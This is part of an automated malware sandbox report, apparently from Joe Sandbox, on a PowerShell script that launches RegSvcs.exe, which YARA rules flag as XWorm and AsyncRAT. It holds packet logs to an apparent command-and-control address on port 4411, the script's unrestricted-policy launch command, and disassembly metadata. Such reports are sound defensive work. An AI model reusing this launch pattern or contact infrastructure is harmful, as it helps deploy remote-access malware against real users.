                                  Dec 18, 2024 08:17:37.269892931 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.320854902 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.320981979 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.348973989 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.440526962 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.440623999 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.539654016 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.560091972 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.560192108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.631768942 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.675968885 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.679738998 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.679847002 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.799402952 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.867963076 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:37.869344950 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:37.988852024 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.066378117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.185926914 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.185988903 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.305574894 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.567528009 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.568423986 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.688033104 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.763720036 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:38.764530897 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:38.884138107 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:39.675740004 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:39.796173096 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:39.910533905 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.030132055 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.109606028 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.110503912 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.230232954 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.344360113 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.345812082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.469541073 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.469692945 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:40.589467049 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.955981970 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:40.957962990 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:41.077912092 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:41.149458885 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:41.150301933 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:41.270407915 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:42.597774982 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:42.717453957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.031938076 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.032861948 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.152430058 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.238259077 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.358128071 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.441535950 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.561295033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.671865940 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.672844887 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:43.792363882 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.932846069 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:43.933810949 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.053493977 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.053555965 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.174010992 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.332161903 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.451674938 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.535247087 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.536859035 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.656435966 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.754348040 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.766252041 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.873967886 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:44.874089956 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:44.993684053 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.189141989 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.190207958 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:45.309726954 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.387573957 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.390835047 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:45.500972986 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.510538101 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:45.514055967 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:45.633686066 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.035268068 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.154725075 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.154855013 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.274342060 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.274406910 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.394011974 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.394366026 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.468434095 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.468511105 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.513890982 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.513962984 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.587971926 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.633474112 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.699944973 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.701245070 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.779221058 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.820822001 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.821964025 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.891041994 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.941457033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:46.941647053 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:46.970230103 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.066730022 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:47.108962059 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.110122919 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:47.161184072 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.229646921 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:47.229968071 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:47.399856091 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.097580910 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.217139006 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.217195988 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.336615086 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.410207987 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.529742956 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.529834986 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.531507015 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.581721067 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.696836948 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.696917057 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.720980883 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.769221067 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.819258928 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.819401026 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:48.911993980 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.939055920 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:48.942109108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.007759094 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.061614037 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.062235117 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.181787014 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.244077921 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.244957924 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.364569902 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:49.364687920 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:49.485071898 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.207485914 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.326941013 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.327052116 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.446614027 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.446666956 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.566148996 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.566214085 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.685707092 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.685789108 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.805536985 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.844659090 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.845496893 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:50.996552944 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:50.998094082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.156239033 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.158128023 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.308836937 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.308918953 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.347326040 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.347392082 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.466876030 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.466954947 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.468915939 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.566251040 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.628823996 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:51.628967047 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:51.748609066 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:52.442738056 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:52.562237978 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:52.875960112 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:53.066649914 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:55.454350948 CET497394411192.168.2.692.255.57.155
                                  Dec 18, 2024 08:17:55.574037075 CET44114973992.255.57.155192.168.2.6
                                  Dec 18, 2024 08:17:56.997147083 CET497394411192.168.2.692.255.57.155
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Dec 18, 2024 08:15:09.778357029 CET | 1.1.1.1 | 192.168.2.6 | 0xa3e6 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false |
| Dec 18, 2024 08:15:09.778357029 CET | 1.1.1.1 | 192.168.2.6 | 0xa3e6 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false |


                                  Target ID:0
                                  Start time:02:15:13
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\NLXwvLjXPh.ps1"
                                  Imagebase:0x7ff6e3d50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:02:15:13
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff66e660000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:02:15:16
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\ipconfig.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                  Imagebase:0x7ff643c70000
                                  File size:35'840 bytes
                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:4
                                  Start time:02:15:17
                                  Start date:18/12/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  Imagebase:0xda0000
                                  File size:45'984 bytes
                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.3878649533.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:02:15:17
                                  Start date:18/12/2024
                                  Path:C:\Windows\System32\wermgr.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "3916" "2692" "2700" "2768" "0" "0" "2772" "0" "0" "0" "0" "0"
                                  Imagebase:0x7ff794bc0000
                                  File size:229'728 bytes
                                  MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:11
                                  Start time:02:17:52
                                  Start date:18/12/2024
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 1360
                                  Imagebase:0xd10000
                                  File size:483'680 bytes
                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:11.9%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:48
                                    Total number of Limit Nodes:11

                                    • Opcode Fuzzy Hash: 3cf38344777018473464971d5b06d6560474e82ce86d03da00553e393bdd1941
                                    • Instruction Fuzzy Hash: 8C611171B1410CCFD314EB3CE948A2A77A3FB94318F24859AE865DB394DA74ED458F90
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e6a201072570b4196d72c8cd50f06a5ded4f84fbdd724ce64ce743a60361972
                                    • Instruction ID: 01dc9e367fa8c4d172cec9b21c16c72843fbddffc4d15370a8d706eac9c740cc
                                    • Opcode Fuzzy Hash: 6e6a201072570b4196d72c8cd50f06a5ded4f84fbdd724ce64ce743a60361972
                                    • Instruction Fuzzy Hash: 3A31247171824ECFD704EF69A948126FBA7EBD9200B09C5E7D815CB395C630EC418F95
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7d98bd926b054a41a03b65431bedf3e6851d16cbae3573e4ad6f4a399ac0c68a
                                    • Instruction ID: b7c731bf6bb4218ecb89ef54915158b3f96067f9e7dd4e0f1a66d08f2a0e0fc6
                                    • Opcode Fuzzy Hash: 7d98bd926b054a41a03b65431bedf3e6851d16cbae3573e4ad6f4a399ac0c68a
                                    • Instruction Fuzzy Hash: 36310F71A1814ECFD704EF79A94D126FBA7EBD9210B09C5EBD825CB284C630EC408F91
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf3b14c0abd4da1f20ffc847c22d04b774edb4a28a7946a8aeec4f55a04cabf4
                                    • Instruction ID: a5c4bae45f3028e8626f5bf959a88b6002f69b11f65166c7e210dfa181e5dd7d
                                    • Opcode Fuzzy Hash: bf3b14c0abd4da1f20ffc847c22d04b774edb4a28a7946a8aeec4f55a04cabf4
                                    • Instruction Fuzzy Hash: 5A318B31B0520ECFD704AB7DAC046AFB9AFAFE1600F44425AD525E73D0CA70DE424B81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 181 152ee98-152eea3 182 152eea5-152eecc call 152e5ec 181->182 183 152eecd-152eeec call 152e5f8 181->183 189 152eef2-152eef7 183->189 190 152eeee-152eef1 183->190 191 152eef9-152ef32 189->191 196 152ef34 191->196 197 152ef39-152ef51 191->197 196->191 198 152ef36-152ef38 196->198 201 152ef53-152ef56 197->201 202 152ef57-152ef6a 197->202 198->197 204 152ef71-152efe4 GlobalMemoryStatusEx 202->204 205 152ef6c-152ef70 202->205 208 152efe6-152efec 204->208 209 152efed-152f015 204->209 205->204 208->209
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3876074774.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_1520000_RegSvcs.jbxd

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 212 152ef68-152ef6a 213 152ef71-152efae 212->213 214 152ef6c-152ef70 212->214 216 152efb6-152efe4 GlobalMemoryStatusEx 213->216 214->213 217 152efe6-152efec 216->217 218 152efed-152f015 216->218 217->218
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0152EEEA), ref: 0152EFD7
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3876074774.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_1520000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: f15944e7fda5329d2fc379d0394bf5da5aa02eb7c8e8e6a38c67d8c06a06d010
                                    • Instruction ID: 68944f27ca668e47465b972c39ac8ba48b190813bfc25ae867d34400f8705105
                                    • Opcode Fuzzy Hash: f15944e7fda5329d2fc379d0394bf5da5aa02eb7c8e8e6a38c67d8c06a06d010
                                    • Instruction Fuzzy Hash: 1B2124B2C00269DBDB10CF9AC445BDEFBB4FF49310F15816AD814A7240D378A944CFA5

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 221 152e5f8-152efe4 GlobalMemoryStatusEx 225 152efe6-152efec 221->225 226 152efed-152f015 221->226 225->226
                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0152EEEA), ref: 0152EFD7
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3876074774.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_1520000_RegSvcs.jbxd
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID:
                                    • API String ID: 1890195054-0
                                    • Opcode ID: 9fb326a5bb95911cc2ca0e5390e30a07764c749479595d80bb37a0b678274383
                                    • Instruction ID: d569a700a9feb5d4171bb9f78db3b040c3bd62669fa73a6648c9d3a46edb9ffb
                                    • Opcode Fuzzy Hash: 9fb326a5bb95911cc2ca0e5390e30a07764c749479595d80bb37a0b678274383
                                    • Instruction Fuzzy Hash: FC1136B2C006599BDB10CF9AC444B9EFBF4FF48210F14812AE914A7240D378A950CFA5

                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 78968598a34a0740bbe4fe3d0c4e66234ef60afc53db459b8fab01a5800b9704
                                    • Instruction ID: df12397e9f44ce516978f871cd781da7c8a6a9bf8d0aae88273e9be9630e6d9f
                                    • Opcode Fuzzy Hash: 78968598a34a0740bbe4fe3d0c4e66234ef60afc53db459b8fab01a5800b9704
                                    • Instruction Fuzzy Hash: 1F31E3317142888FCB06DB78C8559997FF6EFCB21071A40EBE046DF7A2DA359D058752
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f2f981b304c1750740536072d2e996a43df72632168a89b6ee42eb5ca31a9468
                                    • Instruction ID: b20d96595e4be3b35a4fc94a958226cabd0e12036449ed7c7abdc5afb2d49051
                                    • Opcode Fuzzy Hash: f2f981b304c1750740536072d2e996a43df72632168a89b6ee42eb5ca31a9468
                                    • Instruction Fuzzy Hash: D1213A35B5421E8BD744DA7D580177F7697F7C8690F1445BAE426DB380EA34EC0187D2
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f6a33250488ea3bbea0cc12f2ada77694f111919755322ee3b76394188570104
                                    • Instruction ID: de75cc5baa6b5ccec50a706ee6dbc3f0518db2077d78c0dc46c78da9ceb2360f
                                    • Opcode Fuzzy Hash: f6a33250488ea3bbea0cc12f2ada77694f111919755322ee3b76394188570104
                                    • Instruction Fuzzy Hash: 76212B3470424A9FC715ABB99C2456EBBEAFFC525070044AADA12CB355EF74EC4687A0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f0bc57e3075a8af462811da7460c049d0aee1055a6c9e1e7903deb7020139318
                                    • Instruction ID: 14dc992f4fbe550d6804213b3b41f58450c2057cceb31615298f93159dcb4337
                                    • Opcode Fuzzy Hash: f0bc57e3075a8af462811da7460c049d0aee1055a6c9e1e7903deb7020139318
                                    • Instruction Fuzzy Hash: E521D335B101088FCB08DB78D5589AEBBF7FFCD210B14806AE516EB361CA31EC058B55
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1a4dda0bd7ab6537b4a2ac43f9559a5db59234db0e74ffdf62cea1a8377ce95e
                                    • Instruction ID: e887bc40c81f0fd93ebd6b90a5809f487d8e44b919c4935aeb2468488fb822df
                                    • Opcode Fuzzy Hash: 1a4dda0bd7ab6537b4a2ac43f9559a5db59234db0e74ffdf62cea1a8377ce95e
                                    • Instruction Fuzzy Hash: A421AC32A1524EAFCB059F68D404B7B7BA6FB84354F0444A9EA168B354CA38ED51CBE0
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.3886389315.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_5b70000_RegSvcs.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7eec4612cef6d6e364bfd2742965fd96644a14464e92d77e78cc4a4b810b76e5
                                    • Instruction ID: a32821326432141a879965cbb3df41c1919bf135a6592fc1211ae24474e278c1
                                    • Opcode Fuzzy Hash: 7eec4612cef6d6e364bfd2742965fd96644a14464e92d77e78cc4a4b810b76e5
                                    • Instruction Fuzzy Hash: 2711B1357201089FCB48EB7CD45995E7BE6EBCD610B6040AAE506DB3A0DA32EC058B91
